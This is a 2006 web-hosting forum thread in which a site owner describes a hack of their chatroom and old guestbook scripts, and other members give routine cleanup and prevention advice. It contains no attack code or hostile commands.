zpry Posted April 4, 2006 Posted April 4, 2006 Yesterday at 3:55 PM EST the chatroom at my site stopped working. This was noticed almost immediately by my site visitors, the chat has been very popular with them for the past six months and has been up and operational for the past year or so. I didn't notice until later in the evening that four of my main index.html files had also been affected. The main www.****/index.html file had been updated at 3:55 pm, and the other three files www.****/section1/index.html etc... Each of those index pages contained a link to someplace and the main index page contained a link to a mime file - when you would visit the main site page, a mime file would try to load and an error message would scroll down from the browser saying I didn't have the right program to run the mime. I then investigated my chat files. Inside the chat directory, under public_html /chatmaindirectory/chat/localization/ The entire localization directory and all the language files inside, had been updated at 3:55 PM. I also noticed that my server status link (I am on server 20) was showing one red button and one yellow button all the rest were green. Disk hda1 (/boot) 95 % (RED BUTTON) Disk hda7 (/home) 84 % (yellow botton) So, I wrote a help ticket up and explained all this. Unfortunately, the only responses I got were very standard. I was told not to share my password with anyone, to check the recent visitors and to check IPs that access my cpanel. They did ask if I wanted to restore to a backup... but I have my own backed up files. I uploaded them with FTP and my site is working just fine again. I guess I was hoping that support might be interested in helping me find what caused this, where my site is vunerable, and help me prevent it from happening again. any input would be appreciated. ~zpry Quote
MikeJ Posted April 4, 2006 Posted April 4, 2006 Most likely, they gained access through a vulnerable script you may have installed. The best thing to do is make sure all of your software is current... if you have any old versions installed, update them. And if you have any software installed that you don't use anymore on your account, remove it. Sometimes you can get an idea of what might have been abused if you download and look through your raw logs and look for odd looking requests. Also look for any suspicious files in any world writable directories you have. The red notice on /boot is nothing to worry about. That's just a system partition that is only written to by admins, so that won't ever be a problem. /home is just showing it's getting a little on the full side, but still has a ways to go. That'll be taken care of if it gets too close to full. Quote
zpry Posted April 5, 2006 Author Posted April 5, 2006 Most likely, they gained access through a vulnerable script you may have installed. The best thing to do is make sure all of your software is current... if you have any old versions installed, update them. And if you have any software installed that you don't use anymore on your account, remove it. I recently updated my Advanced Guestbooks to Lazarus(sp) guestbooks.. and the spamming to them was stopped. I also have kept my message boards. Other than that I don't have any scripts - except the chatroom. That program does seem very old and their website on sourceforge hasn't added anything new for a few years. If anyone can recommend a chatroom that is more up to date and secure.. simple is fine - I would appreciate that. Sometimes you can get an idea of what might have been abused if you download and look through your raw logs and look for odd looking requests. Also look for any suspicious files in any world writable directories you have.I did that, and since I knew the approximate time that the site was hacked I was able to focus in on that hour. I didn't see anything unusual. I also constantly check my recent visitors. I keep a close eye on my error log too and I do notice things fairly quickly that are unusual. In recent months I have found hotlinking from myspace which I stopped and guestbook visitors going directly to the forms.. and I stopped them too. I tried to see my ftp logs, but couldn't figure out how to do that, when I clicked on those links in the cpanel (FTP/Account Maintenance) "You can download your raw access logs at the following URLs using the loginsmiling_logs and your account password: " the error came up.. "You dont have permission to open this page" .. I could see my password in the link that was in the address bar, so I know that wasn't the issue. I tried all the links that were in there. Can I get to these logs using FTP? Where are they among all the directories? The red notice on /boot is nothing to worry about. That's just a system partition that is only written to by admins, so that won't ever be a problem. /home is just showing it's getting a little on the full side, but still has a ways to go. That'll be taken care of if it gets too close to full. Thanks, I don't like red buttons flashing - they make me nervous! zoey Quote
TCH-Carl Posted April 5, 2006 Posted April 5, 2006 From your replies, it seems the hacker got through the chat room scripts. We would recommend disabling it as your backup still contains the outdated one. I do not use chat scripts, so kindly wait till someone can give you details regarding a better one. If you can post a ticket to the help desk explaining the error that you got, they will help you out with the log issue and give you an idea of the depth to which the hack was done. Quote
JTD Posted April 5, 2006 Posted April 5, 2006 Sigma chat is not a bad chat client and the nice thing about it. Is all you do is signup and use a java code script which you imbed in your websites html. http://www.sigmachat.com/ Quote
zpry Posted April 7, 2006 Author Posted April 7, 2006 Thanks everyone, I feel the need to update this thread, because for the last few days I have been keeping a close eye on everything to see if I could see where the problem was. I had also been googling to see if I could find any one else having problems with phpmychat. At this point, I don't think it was the chatroom script that was the vunerable script.. and I'll explain why.. This morning I was looking around in my cpanel and realized that I did have some old scripts still installed - two very old advanced guestbooks (yes, the advice above was weighing on my mind about uninstalling old scripts) - I had kept them installed, because they had been very large with lots of signatures from friends and I wanted to keep them as records, though I had no links to them on my website, so I didn't think they would get visitors. I went to look at those guestbooks, and immediately the same message came up that a Mime file was downloading. I also noticed that the guestbook signatures had been corrupted and I saw a lot of links that had the word Russia in them (reminded me of the localization directory name) I forced quit my browser, and then went all through my site making sure nothing had been damaged, and then I went into cpanel and removed those old guestbooks and deleted their databases. So, now I am thinking that was the entry point. At least I hope so. I also deleted all the languages from my phpmychat localization directory except English, just because I worried that was the vunerable entry point after reading some stuff I found on the net about hacks into Phpmychat. The stuff I found wasn't in english, but from what I saw, they were using those language files to access. I alsp found this article, but I really dont understand it and it didn't really seem to apply to what happened at my site. http://www.securityfocus.com/bid/13627/discuss So, that is all I am going to do for now unless something else happens. .. hopefully not! Thanks for the advice about removing old unused scripts, as I think that was the bit that is going to save me in the long run. Thanks for the friendly replies too. z Quote
stevevan Posted April 7, 2006 Posted April 7, 2006 Thanks for the update, Z. Hopefully this may help someone else in the future. Quote
zpry Posted April 8, 2006 Author Posted April 8, 2006 I have one more update on this issue - cripes! I discovered today that in my new updated Lazarus Guestbooks - the Admin passwords had been reset! I knew I hadn't forgotten them so I was pretty confused. So, when I looked at my new guestbook files, in the TEMP and PUBLIC directories, there were files added there at the exact same time of the hack earlier in the week (see above posts) I deleted those files.. (I did download them and looked at them - but have no clue what they are or were trying to do - if anyone wants to see them I will save them) but my password still didnt work, so I went to the Lazarus Guestbook site and downloaded the little fix he made that resets your password. I did that fix, and all is well. My new guestbooks were never hacked into or spammed, but somehow my admin password did get reset. I am even more certain than ever that the way the site was hacked was through those OLD guestbooks.. that I should have deleted. Ok.. hopefully this will be my last post to this thread and nothing else turned up damaged. z Quote
TCH-Bruce Posted April 8, 2006 Posted April 8, 2006 Thanks for the update. Hopefully you won't have anymore problems. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.